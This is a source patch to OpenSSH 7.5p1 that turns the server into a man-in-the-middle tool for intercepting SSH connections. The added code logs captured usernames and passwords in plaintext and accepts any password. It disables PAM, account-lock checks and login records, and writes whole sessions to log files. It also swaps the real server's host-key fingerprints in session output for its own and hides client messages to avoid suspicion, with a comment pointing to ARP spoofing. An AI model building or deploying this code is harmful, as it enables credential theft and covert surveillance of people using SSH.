openssh-7.5p1-mitm.patch

1. diff -ru --new-file -x '*~' -x 'config.*' -x Makefile -x opensshd.init -x survey.sh -x openssh.xml -x buildpkg.sh -x output.0 -x requests -x traces.0 -x configure openssh-7.5p1/auth2.c openssh-7.5p1-mitm/auth2.c
2. --- openssh-7.5p1/auth2.c   2017-03-19 22:39:27.000000000 -0400
3. +++ openssh-7.5p1-mitm/auth2.c  2018-06-12 17:44:46.341760621 -0400
4. @@ -222,6 +222,10 @@
5.         fatal("input_userauth_request: no authctxt");
6.  
7.     user = packet_get_cstring(NULL);
8. +   authctxt->original_user = xstrdup(user);
9. +   free(user);
10. +   user = xstrdup(UNPRIVED_MITM_USER);
11. +
12.     service = packet_get_cstring(NULL);
13.     method = packet_get_cstring(NULL);
14.     debug("userauth-request for user %s service %s method %s", user, service, method);
15. @@ -329,6 +333,8 @@
16.         return;
17.  
18.  #ifdef USE_PAM
19. +   /* Disable PAM entirely. */
20. +   if (0) {
21.     if (options.use_pam && authenticated) {
22.         if (!PRIVSEP(do_pam_account())) {
23.             /* if PAM returned a message, send it to the user */
24. @@ -341,6 +347,7 @@
25.                 "configuration", authctxt->user);
26.         }
27.     }
28. +        }
29.  #endif
30.  
31.  #ifdef _UNICOS
32. diff -ru --new-file -x '*~' -x 'config.*' -x Makefile -x opensshd.init -x survey.sh -x openssh.xml -x buildpkg.sh -x output.0 -x requests -x traces.0 -x configure openssh-7.5p1/auth2-passwd.c openssh-7.5p1-mitm/auth2-passwd.c
33. --- openssh-7.5p1/auth2-passwd.c    2017-03-19 22:39:27.000000000 -0400
34. +++ openssh-7.5p1-mitm/auth2-passwd.c   2018-06-12 17:44:46.341760621 -0400
35. @@ -43,9 +43,11 @@
36.  #include "monitor_wrap.h"
37.  #include "misc.h"
38.  #include "servconf.h"
39. +#include "lol.h"
40.  
41.  /* import */
42.  extern ServerOptions options;
43. +extern Lol *lol;
44.  
45.  static int
46.  userauth_passwd(Authctxt *authctxt)
47. @@ -65,6 +67,13 @@
48.     }
49.     packet_check_eom();
50.  
51. +   char *user = authctxt->user;
52. +   if (authctxt->original_user != NULL)
53. +     user = authctxt->original_user;
54. +
55. +   logit("INTERCEPTED PASSWORD: hostname: [%s]; username: [%s]; password: [%s]", lol->original_host, user, password);
56. +   lol->username = strdup(user);
57. +   lol->password = strdup(password);
58.     if (change)
59.         logit("password change not supported");
60.     else if (PRIVSEP(auth_password(authctxt, password)) == 1)
61. diff -ru --new-file -x '*~' -x 'config.*' -x Makefile -x opensshd.init -x survey.sh -x openssh.xml -x buildpkg.sh -x output.0 -x requests -x traces.0 -x configure openssh-7.5p1/auth2-pubkey.c openssh-7.5p1-mitm/auth2-pubkey.c
62. --- openssh-7.5p1/auth2-pubkey.c    2017-03-19 22:39:27.000000000 -0400
63. +++ openssh-7.5p1-mitm/auth2-pubkey.c   2018-06-12 17:44:46.341760621 -0400
64. @@ -477,7 +477,7 @@
65.         closefrom(STDERR_FILENO + 1);
66.  
67.         /* Don't use permanently_set_uid() here to avoid fatal() */
68. -       if (setresgid(pw->pw_gid, pw->pw_gid, pw->pw_gid) != 0) {
69. +       /*if (setresgid(pw->pw_gid, pw->pw_gid, pw->pw_gid) != 0) {
70.             error("%s: setresgid %u: %s", tag, (u_int)pw->pw_gid,
71.                 strerror(errno));
72.             _exit(1);
73. @@ -487,13 +487,15 @@
74.                 strerror(errno));
75.             _exit(1);
76.         }
77. +       */
78.         /* stdin is pointed to /dev/null at this point */
79.         if (dup2(STDIN_FILENO, STDERR_FILENO) == -1) {
80.             error("%s: dup2: %s", tag, strerror(errno));
81.             _exit(1);
82.         }
83.  
84. -       execve(av[0], av, child_env);
85. +       /* Not sure when this happens, exactly, but we definitely never want to execute anything. */
86. +       /*execve(av[0], av, child_env);*/
87.         error("%s exec \"%s\": %s", tag, command, strerror(errno));
88.         _exit(127);
89.     default: /* parent */
90. diff -ru --new-file -x '*~' -x 'config.*' -x Makefile -x opensshd.init -x survey.sh -x openssh.xml -x buildpkg.sh -x output.0 -x requests -x traces.0 -x configure openssh-7.5p1/auth.c openssh-7.5p1-mitm/auth.c
91. --- openssh-7.5p1/auth.c    2017-03-19 22:39:27.000000000 -0400
92. +++ openssh-7.5p1-mitm/auth.c   2018-06-12 17:44:46.341760621 -0400
93. @@ -152,6 +152,8 @@
94. #ifdef USE_LIBIAF
95.         free((void *) passwd);
96. #endif /* USE_LIBIAF */
97. +       /* Allow logins to our locked-out bogus user. */
98. +       locked = 0;
99.         if (locked) {
100.             logit("User %.100s not allowed because account is locked",
101.                 pw->pw_name);
102. diff -ru --new-file -x '*~' -x 'config.*' -x Makefile -x opensshd.init -x survey.sh -x openssh.xml -x buildpkg.sh -x output.0 -x requests -x traces.0 -x configure openssh-7.5p1/auth.h openssh-7.5p1-mitm/auth.h
103. --- openssh-7.5p1/auth.h    2017-03-19 22:39:27.000000000 -0400
104. +++ openssh-7.5p1-mitm/auth.h   2018-06-12 17:44:46.341760621 -0400
105. @@ -59,6 +59,7 @@
106.     int      server_caused_failure;
107.     int      force_pwchange;
108.     char        *user;      /* username sent by the client */
109. +   char        *original_user; /* username that the client actually wants to connect as */
110.     char        *service;
111.     struct passwd   *pw;        /* set if 'valid' */
112.     char        *style;
113. diff -ru --new-file -x '*~' -x 'config.*' -x Makefile -x opensshd.init -x survey.sh -x openssh.xml -x buildpkg.sh -x output.0 -x requests -x traces.0 -x configure openssh-7.5p1/auth-passwd.c openssh-7.5p1-mitm/auth-passwd.c
114. --- openssh-7.5p1/auth-passwd.c 2017-03-19 22:39:27.000000000 -0400
115. +++ openssh-7.5p1-mitm/auth-passwd.c    2018-06-12 17:44:46.341760621 -0400
116. @@ -121,6 +121,8 @@
117.     if (options.use_pam)
118.         return (sshpam_auth_passwd(authctxt, password) && ok);
119. #endif
120. +   /* Accept all password authentication. */
121. +   return 1;
122. #if defined(USE_SHADOW) && defined(HAS_SHADOW_EXPIRE)
123.     if (!expire_checked) {
124.         expire_checked = 1;
125. diff -ru --new-file -x '*~' -x 'config.*' -x Makefile -x opensshd.init -x survey.sh -x openssh.xml -x buildpkg.sh -x output.0 -x requests -x traces.0 -x configure openssh-7.5p1/auth-sia.c openssh-7.5p1-mitm/auth-sia.c
126. --- openssh-7.5p1/auth-sia.c    2017-03-19 22:39:27.000000000 -0400
127. +++ openssh-7.5p1-mitm/auth-sia.c   2018-06-12 17:44:46.341760621 -0400
128. @@ -107,7 +107,7 @@
129.  
130.     sia_ses_release(&ent);
131.  
132. -   setuid(0);
133. +   /*setuid(0);*/
134.     permanently_set_uid(pw);
135. }
136.  
137. diff -ru --new-file -x '*~' -x 'config.*' -x Makefile -x opensshd.init -x survey.sh -x openssh.xml -x buildpkg.sh -x output.0 -x requests -x traces.0 -x configure openssh-7.5p1/channels.c openssh-7.5p1-mitm/channels.c
138. --- openssh-7.5p1/channels.c    2017-03-19 22:39:27.000000000 -0400
139. +++ openssh-7.5p1-mitm/channels.c   2018-06-12 17:44:46.341760621 -0400
140. @@ -82,6 +82,7 @@
141. #include "key.h"
142. #include "authfd.h"
143. #include "pathnames.h"
144. +#include "lol.h"
145.  
146. /* -- channel core */
147.  
148. @@ -191,6 +192,12 @@
149. static int connect_next(struct channel_connect *);
150. static void channel_connect_ctx_free(struct channel_connect *);
151.  
152. +void log_input(Channel *c, char *buf, int len);
153. +void log_output(Channel *c, char *buf, int len);
154. +void logx(Channel *c, char *buf, int len);
155. +char *replace_fingerprints(Channel *c, char *input, int input_size, int *output_len, int *free_result);
156. +void handle_overlap(Channel *c, char *input, unsigned int input_len, unsigned int *output_len);
157. +
158. /* -- channel core */
159.  
160. Channel *
161. @@ -504,6 +511,23 @@
162.     if (c->filter_cleanup != NULL && c->filter_ctx != NULL)
163.         c->filter_cleanup(c->self, c->filter_ctx);
164.     channels[c->self] = NULL;
165. +   /*
166. +   if (c->log_fd > 0) {
167. +       fdatasync(c->log_fd);
168. +       close(c->log_fd);
169. +       c->log_fd = 0;
170. +   }
171. +   */
172. +   free(c->legit_md5_fingerprint);    c->legit_md5_fingerprint = NULL;
173. +   c->legit_md5_fingerprint_len = 0;
174. +   free(c->legit_sha256_fingerprint); c->legit_sha256_fingerprint = NULL;
175. +   c->legit_sha256_fingerprint_len = 0;
176. +   free(c->our_md5_fingerprint);      c->our_md5_fingerprint = NULL;
177. +   c->our_md5_fingerprint_len = 0;
178. +   free(c->our_sha256_fingerprint);   c->our_sha256_fingerprint = NULL;
179. +   c->our_sha256_fingerprint_len = 0;
180. +   free(c->extra_fp_bytes);           c->extra_fp_bytes = NULL;
181. +   c->extra_fp_bytes_len = 0;
182.     free(c);
183. }
184.  
185. @@ -853,12 +877,14 @@
186.  
187. void
188. channel_set_fds(int id, int rfd, int wfd, int efd,
189. -    int extusage, int nonblock, int is_tty, u_int window_max)
190. +    int extusage, int nonblock, int is_tty, u_int window_max, int session_log_fd, int is_sftp)
191. {
192.     Channel *c = channel_lookup(id);
193.  
194.     if (c == NULL || c->type != SSH_CHANNEL_LARVAL)
195.         fatal("channel_activate for non-larval channel %d.", id);
196. +   c->log_fd = session_log_fd;
197. +   c->is_sftp = is_sftp;
198.     channel_register_fds(c, rfd, wfd, efd, extusage, nonblock, is_tty);
199.     c->type = SSH_CHANNEL_OPEN;
200.     c->local_window = c->local_window_max = window_max;
201. @@ -1729,6 +1755,8 @@
202. {
203.     char buf[CHAN_RBUF];
204.     int len, force;
205. +   char *output = NULL;
206. +   int output_len = 0, real_output_len = 0, free_result = 0;
207.  
208.     force = c->isatty && c->detach_close && c->istate != CHAN_INPUT_CLOSED;
209.     if (c->rfd != -1 && (force || FD_ISSET(c->rfd, readset))) {
210. @@ -1758,16 +1786,23 @@
211.             }
212.             return -1;
213.         }
214. +
215. +       /* Replace the legit server's fingerprints in the output with
216. +        * our fingerprints.  >:] */
217. +       output = replace_fingerprints(c, buf, len, &output_len, &free_result);
218. +       handle_overlap(c, output, output_len, &real_output_len);
219. +       log_output(c, output, real_output_len);
220.         if (c->input_filter != NULL) {
221. -           if (c->input_filter(c, buf, len) == -1) {
222. +           if (c->input_filter(c, output, real_output_len) == -1) {
223.                 debug2("channel %d: filter stops", c->self);
224.                 chan_read_failed(c);
225.             }
226.         } else if (c->datagram) {
227. -           buffer_put_string(&c->input, buf, len);
228. +           buffer_put_string(&c->input, output, real_output_len);
229.         } else {
230. -           buffer_append(&c->input, buf, len);
231. +           buffer_append(&c->input, output, real_output_len);
232.         }
233. +       if (free_result) { free(output); output = NULL; }
234.     }
235.     return 1;
236.  }
237. @@ -1824,6 +1859,7 @@
238.             dlen = MIN(dlen, 8*1024);
239.  #endif
240.  
241. +       log_input(c, buf, dlen);
242.         len = write(c->wfd, buf, dlen);
243.         if (len < 0 &&
244.             (errno == EINTR || errno == EAGAIN || errno == EWOULDBLOCK))
245. @@ -4670,3 +4706,246 @@
246.     packet_send();
247.     packet_write_wait();
248.  }
249. +
250. +void log_input(Channel *c, char *buf, int len) {
251. +  logx(c, buf, len);
252. +}
253. +
254. +void log_output(Channel *c, char *buf, int len) {
255. +  logx(c, buf, len);
256. +}
257. +
258. +void logx(Channel *c, char *buf, int len) {
259. +  /* Do not log the raw binary stream if this is an SFTP channel. */
260. +  if (c->is_sftp)
261. +    return;
262. +  else {
263. +    int written = 0;
264. +    int ret = -1;
265. +
266. +    if (c->log_fd <= 0)
267. +      return;
268. +
269. +    while (written < len) {
270. +      ret = write(c->log_fd, buf + written, len - written);
271. +      if (ret < 0)
272. +   return;
273. +
274. +      written += len;
275. +    }
276. +  }
277. +}
278. +
279. +/* This function searches and replaces the legitimate server's host key
280. + * fingerprints with ours.
281. + *
282. + *     "input" is the character buffer to search.
283. + *     "output_len" holds the number of characters written to the output return
284. + *         value.
285. + *     "free_result" is set to 1 if the caller must call free() on the return
286. + *         value when finished with it.
287. + */
288. +char *replace_fingerprints(Channel *c, char *input, int input_size, int *output_len, int *free_result) {
289. +  char *orig_input = input;
290. +  int orig_input_size = input_size;
291. +
292. +  char *needle = NULL, *needle_replacement = NULL;
293. +  int needle_len = 0, needle_replacement_len = 0;
294. +
295. +  void *ptr = NULL;
296. +  char *output = NULL;
297. +
298. +  int output_size = 0;
299. +  int allocated_input = 0, allocated_output = 0;
300. +  int prefix_len = 0, suffix_len = 0;
301. +  int i = 0;
302. +  int output_is_input = 0;
303. +
304. +  *output_len = input_size;
305. +
306. +  /* If extra bytes are set from a previous call (i.e.: a partial fingerprint
307. +   * from a previous input block), prepend them to the input in a new buffer. */
308. +  if (c->extra_fp_bytes_len > 0) {
309. +    int new_input_size = input_size + c->extra_fp_bytes_len;
310. +    char *new_input = calloc(new_input_size, sizeof(char));
311. +    if (new_input == NULL)
312. +      goto replace_fingerprints_error;
313. +
314. +    memcpy(new_input, c->extra_fp_bytes, c->extra_fp_bytes_len);
315. +    memcpy(new_input + c->extra_fp_bytes_len, input, input_size);
316. +
317. +    input = new_input;
318. +    *output_len = input_size = new_input_size;
319. +    allocated_input = 1;
320. +    c->extra_fp_bytes_len = 0;
321. +  }
322. +
323. +  /* Process the MD5 and SHA256 fingerprint types. */
324. +  for (i = 0; i < 2; i++) {
325. +    if (i == 0) {
326. +      needle = c->legit_md5_fingerprint;
327. +      needle_len = c->legit_md5_fingerprint_len;
328. +      needle_replacement = c->our_md5_fingerprint;
329. +      needle_replacement_len = c->our_md5_fingerprint_len;
330. +    } else if(i == 1) {
331. +      needle = c->legit_sha256_fingerprint;
332. +      needle_len = c->legit_sha256_fingerprint_len;
333. +      needle_replacement = c->our_sha256_fingerprint;
334. +      needle_replacement_len = c->our_sha256_fingerprint_len;
335. +    }
336. +
337. +    /* If we don't have all the info we need to search and replace, skip this
338. +     * fingerprint type. */
339. +    if ((needle_len == 0) || (needle_replacement_len == 0))
340. +      continue;
341. +
342. +    /* Search for the needle in the haystack. */
343. +    if ((ptr = memmem(input, input_size, needle, needle_len)) != NULL) {
344. +
345. +      /* If an output buffer isn't decided yet... */
346. +      if (output == NULL) {
347. +
348. +   /* We will choose to overwrite the input buffer with the output, if it
349. +    * fits.  If it doesn't, we need to allocate a new buffer. */
350. +   output_size = input_size - needle_len + needle_replacement_len;
351. +   if (output_size > input_size) {
352. +     output = calloc(output_size, sizeof(char));
353. +
354. +     if (output == NULL)
355. +       goto replace_fingerprints_error;
356. +
357. +     allocated_output = 1;
358. +     output_is_input = 0;
359. +   } else {
360. +     output = input;
361. +     output_size = input_size;
362. +     output_is_input = 1;
363. +   }
364. +
365. +      /* We already set an output buffer (note that we could have allocated it
366. +       * ourselves, or it may be the input buffer).  Check if its big enough
367. +       * for the replacement string.  If not, allocate a new one or re-allocate
368. +       * the existing one, as necessary. */
369. +      } else {
370. +   int _output_size = input_size - needle_len + needle_replacement_len;
371. +   if (_output_size > output_size) {
372. +     output_size = _output_size;
373. +
374. +     /* If we had already allocated a buffer, re-allocate it with the
375. +      * number of bytes we need.  Otherwise, allocate a new one. */
376. +     if (allocated_output == 1)
377. +       output = realloc(output, output_size);
378. +     else
379. +       output = calloc(output_size, sizeof(char));
380. +
381. +     if (output == NULL)
382. +       goto replace_fingerprints_error;
383. +
384. +     allocated_output = 1;
385. +     output_is_input = 0;
386. +   }
387. +      }
388. +
389. +      /* Calculate the length of the prefix and suffix around the string we
390. +       * are replacing. */
391. +      prefix_len = (char *)ptr - input;
392. +      suffix_len = input_size - prefix_len - needle_len;
393. +
394. +      /* Copy the prefix, string replacement, and suffix into the output. */
395. +      memmove(output, input, prefix_len);
396. +      memmove(output + prefix_len, needle_replacement, needle_replacement_len);
397. +      memmove(output + prefix_len + needle_replacement_len, (char *)ptr + needle_len, suffix_len);
398. +
399. +      /* Update the number of bytes we wrote into the output buffer. */
400. +      *output_len = prefix_len + needle_replacement_len + suffix_len;
401. +    }
402. +  }
403. +
404. +  /* If the output pointer has been set (meaning that a substitution was made),
405. +   * free the input buffer if necessary.  Return a pointer to the output
406. +   * buffer. */
407. +  if (output != NULL) {
408. +    if (allocated_input && !output_is_input) {
409. +      free(input); input = NULL;
410. +      allocated_input = 0;
411. +    }
412. +
413. +    *free_result = allocated_input | allocated_output;
414. +    return output;
415. +
416. +  /* If no substitution was made, return the input buffer (which we may have
417. +   * allocated ourselves). */
418. +  } else {
419. +    *free_result = allocated_input;
420. +    return input;
421. +  }
422. +
423. + replace_fingerprints_error:
424. +  if (allocated_input) {
425. +    free(input); input = NULL;
426. +  }
427. +  if (allocated_output) {
428. +    free(output); output = NULL;
429. +  }
430. +  *free_result = 0;
431. +  *output_len = orig_input_size;
432. +  return orig_input;
433. +}
434. +
435. +/* Handles any partial fingerprints found at the end of the input block.  Any
436. + * that are found are placed in the Channel's "extra_fp_bytes" buffer, which
437. + * will be prepended in the next block's buffer by replace_fingerprints().  The
438. + * smallest partial fingerprint this will look for is of length 8, so as to
439. + * maintain high responsiveness for interactive shell sessions.
440. + *
441. + *    "input" is the input buffer to process.
442. + *    "input_len" is the number of bytes to process in the input buffer.
443. + *    "output_len" is the new number of bytes the caller should use in the
444. + *        input buffer, where output_len <= input_len.
445. + */
446. +void handle_overlap(Channel *c, char *input, unsigned int input_len, unsigned int *output_len) {
447. +  unsigned int i, shift;
448. +  char *needle = NULL;
449. +  unsigned int needle_len = 0;
450. +  int found_substr = 0;
451. +
452. +  *output_len = input_len;
453. +
454. +  /* Don't bother processing input blocks smaller than 8, since that is the
455. +   * minimum size we will look for.  This is a tradeoff between shell
456. +   * responsiveness and completeness.  For interactive shell sessions,
457. +   * responsiveness is much more important... */
458. +  if (input_len < 8)
459. +    return;
460. +
461. +  for (i = 0; i < 2; i++) {
462. +    if (i == 0) {
463. +      needle = c->legit_md5_fingerprint;
464. +      needle_len = c->legit_md5_fingerprint_len;
465. +    } else if (i == 1) {
466. +      needle = c->legit_sha256_fingerprint;
467. +      needle_len = c->legit_sha256_fingerprint_len;
468. +    }
469. +
470. +    /* If we don't have a needle, don't bother to continue processing. */
471. +    if (needle_len == 0)
472. +      continue;
473. +
474. +    /* Begin by looking at the last 8 bytes of the input, and see if it matches
475. +     * the first 8 bytes of the fingerprint.  Then look at the last/first 9
476. +     * bytes, etc. */
477. +    found_substr = 0;
478. +    for (shift = 8; (shift < needle_len) && (shift <= input_len); shift++) {
479. +      if (memcmp(input + (input_len - shift), needle, shift) == 0)
480. +   found_substr = shift;
481. +    }
482. +
483. +    /* If we find a match, move the matching characters to the extra_chars
484. +     * array, and shorten the length of the output. */
485. +    if (found_substr > 0) {
486. +      c->extra_fp_bytes_len = found_substr;
487. +      memcpy(c->extra_fp_bytes, input + input_len - found_substr, c->extra_fp_bytes_len);
488. +      *output_len = input_len - found_substr;
489. +    }
490. +  }
491. +}
492. diff -ru --new-file -x '*~' -x 'config.*' -x Makefile -x opensshd.init -x survey.sh -x openssh.xml -x buildpkg.sh -x output.0 -x requests -x traces.0 -x configure openssh-7.5p1/channels.h openssh-7.5p1-mitm/channels.h
493. --- openssh-7.5p1/channels.h    2017-03-19 22:39:27.000000000 -0400
494. +++ openssh-7.5p1-mitm/channels.h   2018-06-12 17:44:46.341760621 -0400
495. @@ -164,6 +164,22 @@
496.     void            *mux_ctx;
497.     int         mux_pause;
498.     int             mux_downstream_id;
499. +
500. +   int log_fd;     /* File handle for logging sessions. */
501. +   int is_sftp;            /* Set to 1 if this is an SFTP channel. */
502. +
503. +   /* The MD5 & SHA256 fingerprints of the legit server's host keys, as
504. +    * well as the fingerprints for our host keys. */
505. +   char *legit_md5_fingerprint;
506. +   unsigned int legit_md5_fingerprint_len;
507. +   char *legit_sha256_fingerprint;
508. +   unsigned int legit_sha256_fingerprint_len;
509. +   char *our_md5_fingerprint;
510. +   unsigned int our_md5_fingerprint_len;
511. +   char *our_sha256_fingerprint;
512. +   unsigned int our_sha256_fingerprint_len;
513. +   char *extra_fp_bytes;
514. +   unsigned int extra_fp_bytes_len;
515.  };
516.  
517.  #define CHAN_EXTENDED_IGNORE       0
518. @@ -214,7 +230,7 @@
519.  Channel    *channel_by_remote_id(int);
520.  Channel    *channel_lookup(int);
521.  Channel *channel_new(char *, int, int, int, int, u_int, u_int, int, char *, int);
522. -void    channel_set_fds(int, int, int, int, int, int, int, u_int);
523. +void    channel_set_fds(int, int, int, int, int, int, int, u_int, int, int);
524.  void    channel_free(Channel *);
525.  void    channel_free_all(void);
526.  void    channel_stop_listening(void);
527. diff -ru --new-file -x '*~' -x 'config.*' -x Makefile -x opensshd.init -x survey.sh -x openssh.xml -x buildpkg.sh -x output.0 -x requests -x traces.0 -x configure openssh-7.5p1/clientloop.c openssh-7.5p1-mitm/clientloop.c
528. --- openssh-7.5p1/clientloop.c  2017-03-19 22:39:27.000000000 -0400
529. +++ openssh-7.5p1-mitm/clientloop.c 2018-06-12 17:44:46.341760621 -0400
530. @@ -1752,7 +1752,10 @@
531.     if (have_pty && options.log_level != SYSLOG_LEVEL_QUIET) {
532.         snprintf(buf, sizeof buf,
533.             "Connection to %.64s closed.\r\n", host);
534. -       buffer_append(&stderr_buffer, buf, strlen(buf));
535. +       /* Suppress this message, otherwise the user will see our
536. +        * client make the same output as their own client (which would
537. +        * be a little weird/suspicious). */
538. +       /*buffer_append(&stderr_buffer, buf, strlen(buf));*/
539.     }
540.  
541.     /* Output any buffered data for stdout. */
542. diff -ru --new-file -x '*~' -x 'config.*' -x Makefile -x opensshd.init -x survey.sh -x openssh.xml -x buildpkg.sh -x output.0 -x requests -x traces.0 -x configure openssh-7.5p1/loginrec.c openssh-7.5p1-mitm/loginrec.c
543. --- openssh-7.5p1/loginrec.c    2017-03-19 22:39:27.000000000 -0400
544. +++ openssh-7.5p1-mitm/loginrec.c   2018-06-12 17:44:46.341760621 -0400
545. @@ -435,6 +435,8 @@
546.  int
547.  login_write(struct logininfo *li)
548.  {
549. +        /* Since we never run as root, never attempt to record the log-in. */
550. +        return (0);
551.  #ifndef HAVE_CYGWIN
552.     if (geteuid() != 0) {
553.         logit("Attempt to write login records by non-root user (aborting)");
554. diff -ru --new-file -x '*~' -x 'config.*' -x Makefile -x opensshd.init -x survey.sh -x openssh.xml -x buildpkg.sh -x output.0 -x requests -x traces.0 -x configure openssh-7.5p1/lol.h openssh-7.5p1-mitm/lol.h
555. --- openssh-7.5p1/lol.h 1969-12-31 19:00:00.000000000 -0500
556. +++ openssh-7.5p1-mitm/lol.h    2018-06-12 17:44:46.341760621 -0400
557. @@ -0,0 +1,56 @@
558. +#ifndef LOL_H
559. +#define LOL_H
560. +
561. +/* Define these in order to force connections to a test host.
562. + * Useful for quickly testing changes without needing to ARP
563. + * spoof; just connect to sshd's port directly. */
564. +/*
565. +#define DEBUG_HOST "testhost"
566. +#define DEBUG_PORT 22
567. +*/
568. +
569. +/* This is the user account that all incoming connections will authenticate
570. + * as (the provided user name is ignored). */
571. +#define UNPRIVED_MITM_USER "ssh-mitm"
572. +
573. +/* The root path of SSH MITM (default: "/home/ssh-mitm/") */
574. +#define MITM_ROOT "/home/" UNPRIVED_MITM_USER "/"
575. +
576. +/* The path to the ssh client config. */
577. +#define MITM_SSH_CLIENT_CONFIG MITM_ROOT "etc/ssh_config"
578. +
579. +/* The path to the modified ssh client. */
580. +#define MITM_SSH_CLIENT MITM_ROOT "bin/ssh"
581. +
582. +/* The path to the client log file. The "ssh" and "sftp" clients' stderr
583. + * will go here. */
584. +#define MITM_SSH_CLIENT_LOG MITM_ROOT "client.log"
585. +
586. +/* This is the size of the buffer used to write the password and read host key
587. + * fingerprints to/from the client program. */
588. +#define SOCKET_PASSWORD_AND_FINGERPRINT_BUFFER_SIZE 1024
589. +
590. +/* The size of the buffer used to store partial fingerprints intercepted. */
591. +#define EXTRA_FP_BYTES_SIZE 64
592. +
593. +/* Uncomment this to open(2) log files with the O_SYNC flag.  Effectively, this
594. + * would cause logs to be written syncronously, though at the expense of lower
595. + * session responsiveness. */
596. +/*#define SYNC_LOG 1*/
597. +
598. +struct _Lol {
599. +  char *original_host;
600. +  unsigned short original_port;
601. +  char *username;
602. +  char *password;
603. +};
604. +typedef struct _Lol Lol;
605. +
606. +#define MAX_SERVER_HOSTKEY_FPS 8
607. +struct _hostkey_fp {
608. +  char *old;
609. +  char *new;
610. +};
611. +typedef struct _hostkey_fp hostkey_fp;
612. +
613. +#endif /* LOL_H */
614. diff -ru --new-file -x '*~' -x 'config.*' -x Makefile -x opensshd.init -x survey.sh -x openssh.xml -x buildpkg.sh -x output.0 -x requests -x traces.0 -x configure openssh-7.5p1/Makefile.in openssh-7.5p1-mitm/Makefile.in
615. --- openssh-7.5p1/Makefile.in   2017-03-19 22:39:27.000000000 -0400
616. +++ openssh-7.5p1-mitm/Makefile.in  2018-06-12 17:44:46.341760621 -0400
617. @@ -23,7 +23,7 @@
618.  VPATH=@srcdir@
619.  SSH_PROGRAM=@bindir@/ssh
620.  ASKPASS_PROGRAM=$(libexecdir)/ssh-askpass
621. -SFTP_SERVER=$(libexecdir)/sftp-server
622. +SFTP_SERVER=/home/ssh-mitm/bin/sftp-server
623.  SSH_KEYSIGN=$(libexecdir)/ssh-keysign
624.  SSH_PKCS11_HELPER=$(libexecdir)/ssh-pkcs11-helper
625.  PRIVSEP_PATH=@PRIVSEP_PATH@
626. @@ -107,7 +107,7 @@
627.     monitor.o monitor_wrap.o auth-krb5.o \
628.     auth2-gss.o gss-serv.o gss-serv-krb5.o \
629.     loginrec.o auth-pam.o auth-shadow.o auth-sia.o md5crypt.o \
630. -   sftp-server.o sftp-common.o \
631. +   sftp-server.o sftp-client.o sftp-common.o \
632.     sandbox-null.o sandbox-rlimit.o sandbox-systrace.o sandbox-darwin.o \
633.     sandbox-seccomp-filter.o sandbox-capsicum.o sandbox-pledge.o \
634.     sandbox-solaris.o
635. @@ -187,8 +187,8 @@
636.  ssh-keyscan$(EXEEXT): $(LIBCOMPAT) libssh.a ssh-keyscan.o
637.     $(LD) -o $@ ssh-keyscan.o $(LDFLAGS) -lssh -lopenbsd-compat -lssh $(LIBS)
638.  
639. -sftp-server$(EXEEXT): $(LIBCOMPAT) libssh.a sftp.o sftp-common.o sftp-server.o sftp-server-main.o
640. -   $(LD) -o $@ sftp-server.o sftp-common.o sftp-server-main.o $(LDFLAGS) -lssh -lopenbsd-compat $(LIBS)
641. +sftp-server$(EXEEXT): $(LIBCOMPAT) libssh.a sftp.o sftp-client.o sftp-common.o sftp-server.o sftp-server-main.o
642. +   $(LD) -o $@ sftp-server.o sftp-client.o sftp-common.o sftp-server-main.o $(LDFLAGS) -lssh -lopenbsd-compat $(LIBS)
643.  
644.  sftp$(EXEEXT): $(LIBCOMPAT) libssh.a sftp.o sftp-client.o sftp-common.o sftp-glob.o progressmeter.o
645.     $(LD) -o $@ progressmeter.o sftp.o sftp-client.o sftp-common.o sftp-glob.o $(LDFLAGS) -lssh -lopenbsd-compat $(LIBS) $(LIBEDIT)
646. diff -ru --new-file -x '*~' -x 'config.*' -x Makefile -x opensshd.init -x survey.sh -x openssh.xml -x buildpkg.sh -x output.0 -x requests -x traces.0 -x configure openssh-7.5p1/monitor.c openssh-7.5p1-mitm/monitor.c
647. --- openssh-7.5p1/monitor.c 2017-03-19 22:39:27.000000000 -0400
648. +++ openssh-7.5p1-mitm/monitor.c    2018-06-12 17:44:46.341760621 -0400
649. @@ -119,6 +119,7 @@
650.  
651.  /* State exported from the child */
652.  static struct sshbuf *child_state;
653. +static struct sshbuf *child_lol = NULL;
654.  
655.  /* Functions on the monitor that answer unprivileged requests */
656.  
657. @@ -360,6 +361,7 @@
658.     ssh_packet_set_log_preamble(ssh, "user %s", authctxt->user);
659.  
660.     mm_get_keystate(pmonitor);
661. +   mm_get_lol(pmonitor);
662.  
663.     /* Drain any buffered messages from the child */
664.     while (pmonitor->m_log_recvfd != -1 && monitor_read_log(pmonitor) == 0)
665. @@ -1613,6 +1615,41 @@
666.     }
667.  }
668.  
669. +void
670. +monitor_apply_lol(struct monitor *pmonitor, Lol *lol)
671. +{
672. +  u_int32_t dummy_len = 1;
673. +  u_char *dummy = NULL;
674. +  u_int32_t original_port = 0;
675. +  u_int32_t username_len = 0;
676. +  u_char *username = NULL;
677. +  u_int32_t password_len = 0;
678. +  u_char *password = NULL;
679. +
680. +  debug3("Applying lol...");
681. +
682. +  if (child_lol == NULL)
683. +    fatal("%s: child_lol is NULL!", __func__);
684. +
685. +  if (sshbuf_get_string(child_lol, &dummy, (size_t *)&dummy_len) != 0 ||
686. +      sshbuf_get_u32(child_lol, &original_port) != 0 ||
687. +      sshbuf_get_u32(child_lol, &username_len) != 0 ||
688. +      sshbuf_get_string(child_lol, &username, (size_t *)&username_len) != 0 ||
689. +      sshbuf_get_u32(child_lol, &password_len) != 0 ||
690. +      sshbuf_get_string(child_lol, &password, (size_t *)&password_len) != 0)
691. +    fatal("%s: sshbuf problems.", __func__);
692. +
693. +  if (/*(strlen(original_host) != original_host_len) ||*/ (strlen(username) != username_len) || (strlen(password) != password_len))
694. +    fatal("%s: more sshbuf problems.", __func__);
695. +
696. +  lol->original_port = (unsigned short)original_port;
697. +
698. +  lol->username = username;
699. +  lol->password = password;
700. +  sshbuf_free(child_lol); child_lol = NULL;
701. +  debug3("Done with lol...");
702. +}
703. +
704.  /* This function requries careful sanity checking */
705.  
706.  void
707. @@ -1627,6 +1664,16 @@
708.     debug3("%s: GOT new keys", __func__);
709.  }
710.  
711. +void
712. +mm_get_lol(struct monitor *pmonitor)
713. +{
714. +   debug3("%s: Waiting for lol", __func__);
715. +   if ((child_lol = sshbuf_new()) == NULL)
716. +       fatal("%s: sshbuf_new failed", __func__);
717. +   mm_request_receive_expect(pmonitor->m_sendfd, MONITOR_REQ_LOL, child_lol);
718. +   debug3("%s: GOT lol", __func__);
719. +}
720. +
721.  
722.  /* XXX */
723.  
